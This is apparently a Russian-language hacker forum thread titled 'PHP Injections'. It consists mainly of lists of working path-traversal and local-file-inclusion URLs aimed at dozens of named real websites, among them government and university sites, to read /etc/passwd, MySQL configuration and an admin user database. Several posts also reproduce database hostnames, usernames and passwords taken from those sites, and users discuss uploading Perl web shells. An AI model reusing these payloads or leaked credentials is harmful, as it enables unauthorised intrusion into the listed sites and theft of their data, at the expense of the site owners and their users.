PHP Иньекции

Code:

http://www.mcxapc.org/static.php?file=../../../../../../../../../../../etc/hosts
http://www.mcxapc.org/static.php?file=../../../../../../../../../../../etc/passwd
http://www.mcxapc.org/static.php?file=../../../../../../../../../../../etc/services
http://www.mcxapc.org/static.php?file=../../../../../../../../../../../etc/group
http://www.mcxapc.org/static.php?file=../../../../../../../../../../../etc/profile
http://www.mcxapc.org/static.php?file=../../../../../../../../../../../etc/skel/.bashrc

 

http://photos.gavintech.com выводится оформленно, приятно читать

 

Code:

http://www.salsalovers.lv/index.php?page=../../../../../../../../../../../etc/passwd
http://www.salsalovers.lv/index.php?page=../../../../../../../../../../../etc/hosts
http://www.salsalovers.lv/index.php?page=../../../../../../../../../../../etc/services
http://www.salsalovers.lv/index.php?page=../../../../../../../../../../../etc/syslog.conf
http://www.salsalovers.lv/index.php?page=../../../../../../../../../../../etc/group
http://www.salsalovers.lv/index.php?page=../../../../../../../../../../../etc/profile

 

http://www.verwirrend.de/

 

usina.com

Code:

http://usina.com/bem-te-vi/source_view.php?file=../../../../../../../../../../../etc/passwd
http://usina.com/bem-te-vi/source_view.php?file=../../../../../../../../../../../etc/skel/.bashrc
http://usina.com/bem-te-vi/source_view.php?file=../../../../../../../../../../../etc/bashrc
http://usina.com/bem-te-vi/source_view.php?file=../../../../../../../../../../../etc/profile
http://usina.com/bem-te-vi/source_view.php?file=../../../../../../../../../../../etc/group
http://usina.com/bem-te-vi/source_view.php?file=../../../../../../../../../../../etc/syslog.conf
http://usina.com/bem-te-vi/source_view.php?file=../../../../../../../../../../../etc/services
http://usina.com/bem-te-vi/source_view.php?file=../../../../../../../../../../../etc/hosts
http://usina.com/bem-te-vi/source_view.php?file=../../../../../../../../../../../etc/my.cnf

 

bteb-bd.org
читалкой удалось достать инфу о бд

Code:

$host       = "mysql229.secureserver.net";
$dbusername = "btebonline";
$dbpassword = "btebreg";
$dbname     = "btebonline";

и

Code:

http://bteb-bd.org/dip2006/index.php?file=../../../../../../../../../../../etc/passwd
http://bteb-bd.org/dip2006/index.php?file=../../../../../../../../../../../etc/hosts
http://bteb-bd.org/dip2006/index.php?file=../../../../../../../../../../../etc/services
http://bteb-bd.org/dip2006/index.php?file=../../../../../../../../../../../etc/syslog.conf
http://bteb-bd.org/dip2006/index.php?file=../../../../../../../../../../../etc/group
http://bteb-bd.org/dip2006/index.php?file=../../../../../../../../../../../etc/profile
http://bteb-bd.org/dip2006/index.php?file=../../../../../../../../../../../etc/inputrc
http://bteb-bd.org/dip2006/index.php?file=../../../../../../../../../../../etc/bashrc

 

Code:

http://www.bnieast.com/cgi-bin/db.pl?h=../../../../../../etc/passwd%00

 

Code:

http://www.clfns.com/news/file.php?file=../../../../../../../../../../../etc/passwd
http://www.clfns.com/news/file.php?file=../../../../../../../../../../../etc/my.cnf
http://www.clfns.com/news/file.php?file=../../../../../../../../../../../etc/hosts
http://www.clfns.com/news/file.php?file=../../../../../../../../../../../etc/services
http://www.clfns.com/news/file.php?file=../../../../../../../../../../../etc/syslog.conf
http://www.clfns.com/news/file.php?file=../../../../../../../../../../../etc/group
http://www.clfns.com/news/file.php?file=../../../../../../../../../../../etc/profile
http://www.clfns.com/news/file.php?file=../../../../../../../../../../../etc/inputrc
http://www.clfns.com/news/file.php?file=../../../../../../../../../../../etc/skel/.bashrc

+
акки админов от сайта

Code:

http://www.clfns.com/news/file.php?file=../../data/users.db.php

 

=\

 

Code:

http://www.mscorecard.com/mscorecard/getfile.php?file=../../../../../../../../../../../etc/passwd

база

Code:

(  $db = mysql_connect("mysql3.nebula.fi", "velocor", "2xAaQf7M") or die ("Error connecting to database."); 
  mysql_select_db("velocor", $db) or die ("Error connecting to database."); 
)

 

тут вроде нет папок на запись =)

тут папки есть, можно поробовать залить перловый шелл =\

 

=\\

 

Code:

http://www.ph3.org/fdload.php?file=../../../../../../../../../../../etc/passwd

м база )

Code:

($storeConfig['type'] = 'mysqlt';
$storeConfig['hostname'] = 'localhost';
$storeConfig['database'] = 'ph3org_gallery';
$storeConfig['username'] = 'ph3org_onsec';
$storeConfig['password'] = '4x4pajer0';
$storeConfig['tablePrefix'] = 'g2_';
$storeConfig['columnPrefix'] = 'g_';)

 

У меня эта ссылка в личке уже с ноября того года Сколько я не трахался с ней, так и не залил...

 

я посмотрел, в той папке где лежит скрипт info.pl уже есть залитые перловые шеллы, только когда пытаешься их выполнить, вылетает service temporary unavailable

 

Code:

http://www.usc2008.uw.edu.pl/index.php?display=../../../../../../../etc/passwd%00 
http://www.sobral.ce.gov.br/comunicacao/novo2/index.php?pagina=cidade/index.php?pagina=/../../../../../../../../etc/passwd 
http://warszawa.ws/?idd=/etc/passwd 
http://www.zss.tarnow.pl/aktualnosci/full.php?plik=/etc/passwd 
http://www.womczest.edu.pl/rodn/default.php?main=forum&sub=kwartalnik&info=roczniki&nr=200409&tr=../../../../../etc/passwd 
https://sklep.pkn.pl/?m=help&a=topic&id=../../../../../../../../etc/passwd%00 
http://wms.mat.agh.edu.pl/~cichacz/beczka.php?plan=../../../../../etc/passwd 
http://www.russian-inok.org/books/nachalnik/page.php?page=../../../../../../../../etc/passwd 
http://www.dancerzine.com/tmpl.php?page=../../../../../../../../../../../../../etc/passwd 
http://www.zdmikp.bydgoszcz.pl/index.php?id=../../../../../../../etc/passwd%00 
http://minipc.org/safepup/index.php?file=../../../../../../../../../../../../../../etc/passwd 
http://www.najogada.com.br/novo/?pg=../../../../../../../../../../../../../etc/passwd%00 
http://ruraldev.maharashtra.gov.in/marathi/dcmNew/news/popupNewsShow.php?file=../../../../../../../../../etc/passwd 
http://www.sierrachart.com/index.php?file=../../../../../../../../../../../../../../etc/passwd 
http://www.photoshots.pl/site/index.php?file=/etc/passwd 
http://regalcityonline.com/index.php?page=../../../../../../../../../../../../../etc/passwd%00 
http://www.gerek.sk/reader.php?openfile=/etc/passwd 
http://smarteducation.pl/demo.php?file=etc/passwd 
http://www.crawf.com.pl/index.php?file=../../../../../etc/passwd 
http://www.kiva.org/app.php?page=../../../../../../../../etc/passwd%00 
http://www.linhadefrente.com.br/index.php?var=/../../../../../../../../etc/passwd 
http://www.cieos.com/en/index.php?path=../../../../../etc/passwd 
http://www.czerniejewo.pl/index.php?page=../../../../../../../../../../../etc/passwd 
http://www.hndkorea.com/board.php?incfile=../../../../../etc/passwd 
http://www.ecomstation.it/ecsoft2/index.php?language=../../../../../../../../../../../../../../etc/passwd 
http://www.krakowglobe.co.uk//index.php?f=../../../../../../../../../../etc/passwd 
http://www.heritagewoodland.co.uk//index.php?f=../../../../../../../../../../etc/passwd 
http://www.oil-price.net/index.php?lang=../../../../../../../../../../../../../../etc/passwd%00 
http://www.zaproszenia-slubne.com/printmedia/index.php?tresc=miniaturki.php&katalog=/etc/passwd 
http://cdeam.ufam.edu.br/eficiencia/eficiencia.php?page=../../../../../../../../../etc/passwd 
http://www.kolkovna.cz/index.php?language=../../../../../../../../../../../../../../etc/passwd%00 
http://www.ascot.pl/index.php?lang=../../../../../../../../../../../../../../etc/passwd%00 
http://fcs.maharashtra.gov.in/marathi/dcmNew/news/popupNewsShow.php?file=../../../../../../../../../etc/passwd 
http://www.centrum-parkietowe.pl/_dodruku.php5?incfile=/etc/passwd 
http://www.mitschka.eu/index.php?page=./../../../../../../../../../../../etc/passwd 
http://www.weeblackskelf.co.uk/label/main.php?x=artists&y=../../../../../etc/passwd 
http://galerie.superfoto.pl/static.php?static=./../../../../../../../../../etc/passwd%00&sid=MyID484b9c2fafa10 
http://www.thelinkpage.co.uk/index.php?f=/../../../../../../../etc/passwd 
http://papier.sklep.pl/_dodruku.php?incfile=/etc/passwd 
http://www.hcc.vic.edu.au/templates/content.php?incfile=./../../../../../../../../../etc/passwd 
http://romek.intermania.pl/pasieka24/_dodruku.php?incfile=/etc/passwd 
http://www.diabetes-india.com/template1.php?incfile=./../../../../../../../../../etc/passwd 
http://centrumvolvo.pl/pl/stronka.php?id=/etc/passwd 
http://www.accessampn.com/cgi-bin/AMPNtemplate.cgi?incfile=./../../../../../../../../../etc/passwd 
http://www.ksiazkiknk.pl/index.php?site=/etc/passwd 
http://www.hlyb.net/board.html?incfile=./../../../../../../../../../../../../etc/passwd 
http://www.kettlefoods.co.uk/site/HomePage.do?id=./../../../../../../../../../../etc/passwd 
http://www.seeyou.co.jp/pets/subpage.php?incfile=./../../../../../../../../../etc/passwd 
http://www.rachelpopowcer.com/main.php?x=../../../etc/passwd 
http://2edo.com/cgi-bin/eStore/index.cgi?page=../../../../../../../../etc/passwd 
http://www.softworld.pl/mp3/?download=../../../../../../../etc/passwd 
http://www.studiosupra.pl/index.php?str=cokolwiek 
http://www.kusat.com/go.php?path=/../../../../../../etc/passwd 
http://www.magicalexperience.co.uk//index.php?f=../../../../../../../../../../etc/passwd 
http://www.guitaremporium.co.uk//index.php?f=../../../../../../../../../../etc/passwd 
http://www.interspeech2005.org/technical//index.php?f=../../../../../../../../../../etc/passwd 
http://www.fluxplay.co.uk//index.php?f=../../../../../../../../../../etc/passwd 
http://www.thewinedetective.co.uk//index.php?f=../../../../../../../../../../etc/passwd 
http://www.tugofwar.co.uk//index.php?f=../../../../../../../../../../etc/passwd 
http://www.hljbsm.gov.cn//index.jsp?id=../../../../../../../../../../etc/passwd 
http://www.vortex.org.uk//index.php?f=../../../../../../../../../../etc/passwd 
http://www.lyson.com.pl/empty.php?incfile=/etc/passwd 
http://www.omnet.com/main.jsp?splsh=4&incfile=../etc/passwd 
http://www.artel.agdex.com/index.php?open=/etc/passwd 
http://www.fanello.ch/index.php?page=./../../../../../../../../../../../etc/passwd 
http://www.cimav.edu.mx/oferta.php?load=../../../../../etc/passwd 
http://www.waszewesele.pl/index2.php?tresc=/../../../etc/passwd 
http://www.artel.agdex.com/index.php?open=/etc/passwd 
http://psychotronika.info/open.php?page=../../../../../../../etc/passwd 
http://www.crawf.com.pl/index.php?file=/etc/passwd 
http://www.allprof.com.pl/beautyimage/index.php?content=../../../../../../../../etc/passwd&id=44 
http://www.rennsportnews.de/index.php?load=/etc/passwd 
http://www.dogs-abc.de/index.php?filename=/etc/passwd 
http://www.piedmontsoccer.org/inde.php?cont=/etc/passwd 
http://www.zaproszenia.com/slub/main.php?link=LFI 
http://www.rennsportnews.de/index.php?load=/etc/passwd 
http://www.belchatow.sr.gov.pl/index.php?id=[LFI] 
http://www.santaclauslive.com/main.php?link=LOCAL_FILE_INCLUDE&pid=2&kieli=eng 
http://www.riversideeurope.com/lang_p/index.php?page=[LFI] 
http://www.fox-foto.com/index.php?strona=../../../../../../../etc/passwd 
http://www.reverie.dreamhost.com/index.php?file_name[]=/etc/passwd 
http://uplynnienia.eu/index.php?id=/etc/passwd 
http://www.opussoft.com.pl/?f=/etc/passwd 
http://www.andrewsmithresearch.co.uk//index.php?f=../../../../../../../../../../etc/passwd 
http://www.egir.dk/index.php?page=/etc/passwd 
http://www.ekonto.net.pl/?id=[local%20include] 
http://www.oepu.at/cms/cms/index.php?page=./../../../../../../../../../../../etc/passwd 
http://programy.ilife.pl/index.php?download=/etc/passwd 
http://www.ranking.pl/index.php?page=AnalizyPage&zone=3&stat=zmiana_metody08&p=/../../../../../../etc/passwd%00 
http://www.saladillo.gov.ar/index.php?include=admin/.passwd 

 

Serbia

Russia

 

Code:

http://www.allsidige.no/elementer.php?file=[INCLUDE]
http://www.cdb.com.kh/index.php?url=[INCLUDE]
http://www.elma.se/index.php?url=[INCLUDE]
http://www.pqfilm.ru/head.php?id=23&file=[INCLUDE]

 

_http://www.postnuke.ru/index.php?module=Static_Docs&type=user&func=view&f=../